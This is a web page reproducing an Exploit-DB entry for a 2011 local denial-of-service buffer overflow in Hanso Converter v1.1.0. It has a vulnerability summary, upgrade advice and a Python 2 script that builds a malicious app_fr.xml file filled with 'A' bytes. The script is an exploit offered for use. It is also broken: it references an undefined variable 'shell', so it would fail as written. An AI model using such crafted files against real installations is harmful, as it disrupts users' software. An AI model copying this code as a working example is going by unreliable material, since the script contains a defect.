header-logo
Suggest Exploit
vendor:
Hanso Converter
by:
Dame Jovanoski(badc0re)
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Hanso Converter
Affected Version From: v1.1.0
Affected Version To: v1.1.0
Patch Exists: Yes
Related CWE: N/A
CPE: hanso-converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Hanso Converter v1.1.0 Language File Buffer Overflow – Denial OF Service

A buffer overflow vulnerability exists in Hanso Converter v1.1.0 when a specially crafted XML file is opened. An attacker can exploit this vulnerability to cause a denial of service condition. The vulnerability is due to a lack of proper validation of user-supplied data when parsing the XML file. An attacker can exploit this vulnerability by creating a malicious XML file and convincing the user to open it.

Mitigation:

Upgrade to the latest version of Hanso Converter.
Source

Exploit-DB raw data:

# Exploit Title: Hanso Converter v1.1.0 Language File Buffer Overflow - Denial OF Service
# Date: 05.02.2011
# Author: Dame Jovanoski(badc0re)
# Software Link: http://www.hansotools.com/downloads/hanso-converter-setup.exe
# Version: v1.1.0
# Tested on: XP sp3
# Type of exploit:local

from struct import *
import time
f=open("app_fr.xml","w")
print "Creating expoit."
time.sleep(1)
print "Creating explot.."
time.sleep(1)
print "Creating explot..."
junk="\x41"*100
print "Your shellcode size is:",len(shell)
try:    
    f.write(junk)  
    f.close()
    print "File created"
except:
    print "File cannot be created"

Navigation

Suggest Exploit

Services By CQR